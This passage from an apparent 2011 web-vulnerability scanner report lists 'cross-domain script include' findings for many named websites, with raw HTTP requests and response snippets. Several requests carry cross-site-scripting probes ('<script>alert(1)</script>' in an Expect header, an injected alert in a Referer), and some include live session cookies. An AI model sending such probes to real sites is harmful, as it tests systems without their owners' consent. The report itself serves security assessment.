Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 35988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head profile="http:/
...[SNIP]...
<div><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div class="textwidget"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

22.50. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/images/star.png HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=81389463.1304488437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=81389463.1818014342.1304488437.1304488437.1304488437.1; __utmc=81389463; __utmb=81389463.2.10.1304488437

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:54:23 GMT; path=/; domain=.quantumjumping.com
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:54:24 GMT; path=/; domain=www.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 00:54:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 36054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head profile="http:/
...[SNIP]...
<div><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div class="textwidget"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

22.51. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blog/wp-content/themes/headway-10-perpetuity-test/skins/quantumjumpingNew/prodigy/images/alert-overlay.png HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=81389463.1304488437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=81389463.1818014342.1304488437.1304488437.1304488437.1; __utmc=81389463; __utmb=81389463.2.10.1304488437

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:54:28 GMT; path=/; domain=.quantumjumping.com
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:54:29 GMT; path=/; domain=www.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 00:54:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 36122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head profile="http:/
...[SNIP]...
<div><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div class="textwidget"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

22.52. http://www.quantumjumping.com/media/themes/images/a/call.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /media/themes/images/a/call.png

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media/themes/images/a/call.png HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.3.10.1304487910

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:53:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2F; expires=Wed, 04-May-2011 03:53:33 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<div style="display: none;">
<script type="text/javascript" src="http://www.linkpatch.com/monitor/76246353061db9d2b69ec5f5450fc29ac0efff78/"></script>
...[SNIP]...

22.53. http://www.radarsync.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radarsync.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.radarsync.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=iaqxja2wyuqvnyuxl2gxfvry; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:49:03 GMT
Content-Length: 32185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<link href="http://www.radarsync.com/assets/style.css" rel="stylesheet" type="text/css" media="screen" />
<script src="http://ajax.aspnetcdn.com/ajax/jquery/jquery-1.4.4.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://cdn.gigya.com/JS/gigya.js?services=socialize"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php"></script>
...[SNIP]...
</script>
    <script type="text/javascript" src="http://cdn.gigya.com/JS/gigya.js?services=socialize"></script>
...[SNIP]...
<!-- begin ad tag (tile=1) -->
<script language="JavaScript" src="http://a.collective-media.net/adj/idgt.radarsync/bottom;tile=1;sz=728x90;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://radarsync.us.intellitxt.com/intellitxt/front.asp?ipid=16371"></script>
...[SNIP]...

22.54. http://www.restaurantrow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.restaurantrow.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.restaurantrow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 29823
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:32:37 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Missing Page : RestaurantRow.com</title>
<meta http-equiv="imagetoolbar" conte
...[SNIP]...
</script>
<script type="text/javascript" id="gmaps_js" src="http://maps.google.com/maps?oe=utf-8&file=api&v=2.145&key=ABQIAAAAnounT8gpSdZD0rjMyJLQ_RT6sdMT_lThAjRZqA-lAkiW3ArjKhRKhlouj9Xv1NQMjJ8pCoevTW8qfA"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

22.55. http://www.sandicor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandicor.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sandicor.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 01:57:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN4b033a0c35680=jgtpus2jtmmhu82u8hkt8unnv1; path=/
Set-Cookie: SN4b033a0c35680=jgtpus2jtmmhu82u8hkt8unnv1; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 36962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</a><script type="text/javascript" src="http://static.addtoany.com/menu/page.js"></script>
...[SNIP]...

22.56. http://www.sepw.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sepw.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sepw.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 02:05:20 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=4htfdd45hxysu455j1tk3yem; path=/
Set-Cookie: Referer=; path=/
Set-Cookie: HttpReferer=; path=/
Set-Cookie: RightColumnNav1:CartList1=1; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28630


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>Small Engine Parts Warehouse - Error Page</title>
       <meta content="Microsoft Visual Studio.NET 7.0" name="G
...[SNIP]...
</SCRIPT>


   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

22.57. http://www.shoppinglifestyle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shoppinglifestyle.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shoppinglifestyle.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1855
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:27:29 GMT

<html><head>
<title>ShoppingLifestyle&reg; - Page not found</title>
<meta http-equiv="REFRESH" content="0;url=http://www.shoppinglifestyle.com/?hop=1">
<SCRIPT LANGUAGE="JavaScript">
function open
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<!-- End of StatCounter Code -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

22.58. http://www.shopshop.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopshop.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shopshop.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:42:08 GMT
Content-Length: 51243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-
...[SNIP]...
<br />
<script type="text/javascript" language="JavaScript" rel="nofollow" src="http://xslt.alexa.com/site_stats/js/t/a?url=www.shopshop.com"></script>
...[SNIP]...
<!-- Begin W3Counter Tracking Code -->
<script type="text/javascript" src="http://www.w3counter.com/tracker.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js">
</script>
...[SNIP]...

22.59. http://www.superherorelease.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superherorelease.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.superherorelease.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:37:31 GMT
Content-Length: 19560


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><link type="text/cs
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

22.60. http://www.theamericanmonk.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theamericanmonk.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.theamericanmonk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5cb03221148399a25dd09778513498e6; __utmz=63675568.1304488484.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63675568.836338964.1304488484.1304488484.1304488484.1; __utmc=63675568; __utmb=63675568.1.10.1304488484; sess_=ysv9sd684163c3y; lastvisit=1304488486; km_lv=1304488488; ref_=mr_7; vid=206617815

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:55:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 23523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
           
<script type="te
...[SNIP]...
<body id="index">

               <script src='http://moonraymarketing.com/tracking.js' type='text/javascript'></script>
...[SNIP]...

22.61. http://www.theamericanmonk.com/members/forgot-password  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theamericanmonk.com
Path:   /members/forgot-password

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /members/forgot-password HTTP/1.1
Host: www.theamericanmonk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:55:07 GMT
Server: Apache
Set-Cookie: PHPSESSID=64df9697db56d868d7731608c49e8271; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 5895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
           
<script type="te
...[SNIP]...
<body id="members" class="forgot-password">

               <script src='http://moonraymarketing.com/tracking.js' type='text/javascript'></script>
...[SNIP]...

22.62. http://www.thehorrordome.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thehorrordome.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thehorrordome.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Date: Wed, 04 May 2011 00:50:03 GMT
Content-Length: 19399
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: anonymousID=5jOKBmeXzAEkAAAANGJjYTBhMDgtMDI4Yi00ZjJlLThmNjgtOWNjYTI4NzJlZjIzZAhK1pnjGvVUlxMBrIsiF9QZi2c1; expires=Mon, 31-Oct-2011 00:50:03 GMT; path=/; HttpOnly
Set-Cookie: chkvalues=y2OQK7WbjFhnaIqejB5qFgWYgpFVR5lqmOfyHuWZxumlJpIfnO1Zy4XG9s2TMXUr; expires=Mon, 31-Oct-2011 00:50:03 GMT; path=/
Set-Cookie: .ASPXAUTHSF=; expires=Tue, 12-Oct-1999 04:00:00 GMT; path=/; HttpOnly
Set-Cookie: chkvalues=y2OQK7WbjFhnaIqejB5qFgWYgpFVR5lqmOfyHuWZxumlJpIfnO1Zy4XG9s2TMXUr; expires=Mon, 31-Oct-2011 00:50:03 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_headTag"><titl
...[SNIP]...
</div>

   <script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

22.63. http://www.truewoman.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truewoman.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.truewoman.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:14:36 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
X-Powered-By: PHP/5.2.10-2ubuntu6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; path=/
Vary: Accept-Encoding
Content-Length: 14433


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4d5596c6511294d4"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

22.64. http://www.truewoman.com/favicon.ic  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truewoman.com
Path:   /favicon.ic

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ic HTTP/1.1
Host: www.truewoman.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:14:32 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
X-Powered-By: PHP/5.2.10-2ubuntu6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; path=/
Vary: Accept-Encoding
Content-Length: 9641


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4d5596c6511294d4"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

22.65. http://www.universalclass.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.universalclass.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.universalclass.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 03:18:49 GMT
Server: Microsoft-IIS/6.0
UCW20: 3.0
X-Powered-By: ASP.NET
Content-Length: 20350
Content-Type: text/html
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HTTP-EQUIV="PRAGMA" CONTE
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Classes in #TITLE#" href="http://www.universalclass.com/i/rss/#CATEGORYDIRNAME#.xml" />

<script type='text/javascript' src='http://4uc.org/js/qmenu.js'></script>
<script type="text/javascript" src="http://4uc.org/js/common.js"></script>
<script type="text/javascript" src="http://4uc.org/js/subModal.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

22.66. http://www.uww.edu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uww.edu
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.uww.edu
Proxy-Connection: keep-alive
Referer: http://www.uww.edu/favicon.ico?8f6b1%22-alert(1)-%22e1d7540cf67=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:29:28 GMT
Content-Length: 15437


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head><meta http
...[SNIP]...
<link rel="stylesheet" type="text/css" href="//fonts.googleapis.com/css?family=PT+Sans: regular,bold" /><script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
...[SNIP]...

22.67. http://www.uww.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uww.edu
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uww.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
